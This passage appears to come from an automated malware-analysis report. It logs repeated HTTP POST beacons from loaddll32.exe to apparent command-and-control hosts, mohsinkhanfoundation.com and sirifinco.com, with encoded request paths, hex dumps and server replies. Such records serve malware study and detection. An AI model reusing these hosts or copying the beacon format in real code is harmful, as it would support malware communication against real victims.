                                          Sep 27, 2021 20:25:58.440282106 CEST1400INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:58 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.749780107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:59.065896988 CEST1406OUTPOST /pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:59.538985968 CEST1416INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:59 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.749781107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:00.813530922 CEST1417OUTPOST /pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:01.207879066 CEST1419INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:00 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.749783107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:01.475281954 CEST1427OUTPOST /pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:01.898823023 CEST1429INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:01 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          19192.168.2.749785107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:02.239057064 CEST1437OUTPOST /pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:02.676656008 CEST1439INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:02 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.749749162.215.253.1480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:47.386585951 CEST994OUTPOST /Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: sirifinco.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:47.528405905 CEST996INHTTP/1.1 406 Not Acceptable
                                          Date: Mon, 27 Sep 2021 18:25:47 GMT
                                          Server: Apache
                                          Content-Length: 226
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 68 31 3e 3c 70 3e 41 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 54 68 69 73 20 65 72 72 6f 72 20 77 61 73 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 4d 6f 64 5f 53 65 63 75 72 69 74 79 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          20192.168.2.749787107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:02.963524103 CEST1441OUTPOST /pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:03.402580023 CEST1448INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:02 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          21192.168.2.749789107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:03.706167936 CEST1450OUTPOST /pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:04.129306078 CEST1458INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:03 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          22192.168.2.749790107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:04.408070087 CEST1460OUTPOST /pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:04.856187105 CEST1468INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:04 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          23192.168.2.749792107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:05.150487900 CEST1470OUTPOST /pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:05.596282959 CEST1472INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:05 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          24192.168.2.749794107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:05.916579962 CEST1480OUTPOST /pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
